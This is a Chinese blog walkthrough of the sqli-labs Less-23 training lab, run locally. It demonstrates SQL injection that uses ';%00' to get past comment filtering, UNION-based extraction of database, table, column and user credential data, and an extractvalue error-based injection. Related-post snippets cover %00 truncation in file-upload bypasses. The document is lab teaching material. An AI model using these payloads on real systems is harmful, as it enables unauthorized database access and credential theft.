sqli-labs-less-23 ;%00绕过

最新推荐文章于 2023-08-24 12:25:11 发布
最新推荐文章于 2023-08-24 12:25:11 发布
阅读量357 收藏 2
点赞数
分类专栏: sql注入 文章标签: sql 信息安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46432288/article/details/110551593
版权

.Less-23

该关卡提示我们使用id注入。
首先判断注入点:
继续使用hackbar插件,

方法一:

http://127.0.0.1/sqli-labs-master/Less-23/?id=1 显示正常,返回了name和password信息
http://127.0.0.1/sqli-labs-master/Less-23/?id=1’ 报错
http://127.0.0.1/sqli-labs-master/Less-23/?id=1’–+ 报错

这里我们发现使用id=1’报错后,应该可以判断出闭合方式为’’,这是使用id=1’–+应该会返回正确,但是这里报错,我们猜测是后台为了避免注入,对–+进行了转义,这里我们使用;%00代替–+进行注释,测试一下猜想,如果后台没有对;%00进行转义,应该会返回正确:

http://127.0.0.1/sqli-labs-master/Less-23/?id=1’;%00
在这里插入图片描述

到了这里以后,我们就可以进行注入:

判断字段列数:

http://127.0.0.1/sqli-labs-master/Less-23/?id=1’ order by 3 ;%00
判断回显位:http://127.0.0.1/sqli-labs-master/Less-23/?id=-1’ union select 1,2,3 ;%00
在这里插入图片描述

获取当前数据库:

http://127.0.0.1/sqli-labs-master/Less-23/?id=-1’ union select 1,2,database() ;%00
在这里插入图片描述

获取所有数据库:

http://127.0.0.1/sqli-labs-master/Less-23/?id=-1’ union select 1,2,(select group_concat(schema_name) from information_schema.schemata) ;%00
在这里插入图片描述

获取security库中的表:

http://127.0.0.1/sqli-labs-master/Less-23/?id=-1’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’) ;%00
在这里插入图片描述

获取users中的字段:

http://127.0.0.1/sqli-labs-master/Less-23/?id=-1’ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’) ;%00
在这里插入图片描述

获取username和password字段的信息:

http://127.0.0.1/sqli-labs-master/Less-23/?id=-1’ union select 1,2,(select group_concat(concat_ws(username,0x7e,password)) from security.users) ;%00
在这里插入图片描述

方法二:

http://127.0.0.1/sqli-labs-master/Less-23/?id=1’ 有报错信息,我们可以使用报错注入
我们已经猜测出闭合方式为’’,因此我们可以使用联合查询将语句带入执行,然后利用报错信息将我们需要的数据带出。

获取当前数据库:

http://127.0.0.1/sqli-labs-master/Less-23/?id=1’ and extractvalue(1,concat(0x7e,database())) or ‘1’='1
在这里插入图片描述

获取其他信息依次类推。。。·

yzcn
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqlilabs23-65
阿刁〇的博客
07-25 293
文章目录SQL-labs 23—Less-23(基于过滤的GET注入)Less-24(二次注入) SQL-labs 23— Less-23(基于过滤的GET注入) 输入?id=1 回显正常 ?id=1' 回显错误 ?id=1' and 1=1# 回显错误 查看源代码 ​ 发现对注释符等进行了过滤,只能采用单引号闭合的方法绕过 输入?id=1' and '1'='1 构造语句,获取数据库 id=-1' union select 1,database(),3 or '1'='1 或
00截断原理
weixin_45522644的博客
07-17 4055
0x00截断原理: 0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。这个可以用在对文件类型名的绕过上。 但要注意是文件的16进制内容里的00,而不是文件名中的00 !!!就是说系统是按16进制读取文件(或者说二进制), 遇到ascii码为零的位置就停止,而这个ascii码为零的位置在16进制中是00,用0x开头表示16进制,也就是所说的0x00截断。 %00是被服务器解码为0x00发挥了截断作用。
%00截断在文件上传漏洞中的妙用
weixin_52796034的博客
08-24 2054
%00截断的原理:0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。 系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。
00截断原理分析
小水池
08-06 2万+
0x00,%00,/00之类的截断,都是一样的,只是不同表示而已 %00截断 下面是用 URL 编码形式表示的 ASCII 字符 在url中%00表示ascll码中的0 ,而ascii中0作为特殊字符保留,表示字符串结束,所以当url中出现%00时就会认为读取已结束 比如 https://mp.csdn.net/upfiles/?filename=test.txt          ...
白名单绕过(%00截断)全网都不会详细讲解的截断原理
m0_58351659的博客
04-01 8558
白名单绕过(%00截断)
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
%00截断问题
p656456564545的专栏
01-05 1万+
%00截断应该是比较经典的攻击手法,但是这个到底是不是漏洞,我也不知道,只是简单记录一下常见的%00利用场景。   一、php 00截断 在php 5.3.4中php修复了0字符,但是在之前的版本中00在php中危害较大。 简单测试一下 php 版本 $_GET["filename"] 这样就可以接收到,这样的请求filename=test.php%00.tx
关于 url 终止符 %00 的问题
java-北京-菜鸟
01-06 4254
问题: 前台传入struts2 的参数总是报格式不正确, 通过 console.log 发现参数后面多了一个 %00, 查了很久才知道这是 url 的终止符.  我的这个 url 是通过另一个 url 拼接过来的 例如: url1 = test.do?name=tom&age=12; 然后我用 location.href 获取 url1 , 通过 split 获取其中的 name 和
%00截断攻击的探索
ncafei的博客
03-18 8893
首先先来看一个简单的asp实例 [plain] view plain copy     username = request("username")       Response.write username   %>   这段代码从URL处获得参数username的值,然后显示在页面中。 可见%00之后的内容没有保存到变量中。
dio 上传文件报错_文件上传漏洞“%00截断”绕过
weixin_39682511的博客
11-21 620
网上传说的 %00截断 其实非常的简单,没有想像中的那么高深,以下给大家简单的讲解一下!还有一点需要注意,关于如何判断文件上传漏洞是否能用%00截断绕过?这个只能试一下才能知道结果,不行的话只能换其它的方法喽!一、%00截断原理www.xxx.com/qq.jpgwww.xxx.com/qq.php%00.jpg => www.xxx.com/qq.php二、文件上传漏洞 %00截断 绕过正...
关于%00截断上传漏洞 php 版本<5.3.4
土拨鼠挖洞中的博客
04-12 1万+
需满足 php 版本&lt;5.3.4 才有可能存在此漏洞上传ma2.php 1.jpg在repeater中更改相应的字节 0x20-&gt;0x00回头在看proxy中相应的字节已经被更改最终显示的结果是可见$_FILES['file']['name']在得到文件名时0x00之后的内容已经不见了,如果在此基础上判断后缀名是否合法,则肯定不能通过。综上所述,0x00不是针对所有基于白名单的后缀名检...
关于00截断原理的一些思考
热门推荐
超人学飞的日子
06-02 2万+
在做CTF web题时,遇到了几道有关00截断的题目,但是有 %00截断和0x00截断,一时很是懵逼。最后自己做了些实验,发现两者是同一个原理,这里拿出来给大家分享下。一,0x00截断0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。这个可以用在对文件类型名的绕过上。一道南邮ctf的题目:如果上传jpg文件:如果上传php文件:这里就要考虑绕过了,用b...
php%00 截断,%00截断问题
weixin_39995280的博客
03-23 4010
一、php00截断在php5.3.4中php修复了0字符,但是在之前的版本中00在php中危害较大。简单测试一下php版本<5.3.4$_GET["filename"]这样就可以接收到,这样的请求filename=test.php%00.txt主要利用常见:1.上传时路径可控,使用00截断2.文件下载时,00截断绕过白名单检查3.文件包含时,00截断后面限制(主要是本地包含时)4....
文件上传%00截断的条件
EC_Carrot的博客
03-04 1298
今天是个好日子啊好日子啊~~然后大佬就问了00截断的条件,我直接断片。。。 00截断条件: PHP版本小于5.3.4 php.ini中的magic_quotes_gpc设置为Off %00截断原理: www.xxx.com/abc.php%00.jpg => www.xxx.com/abc.php ...
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值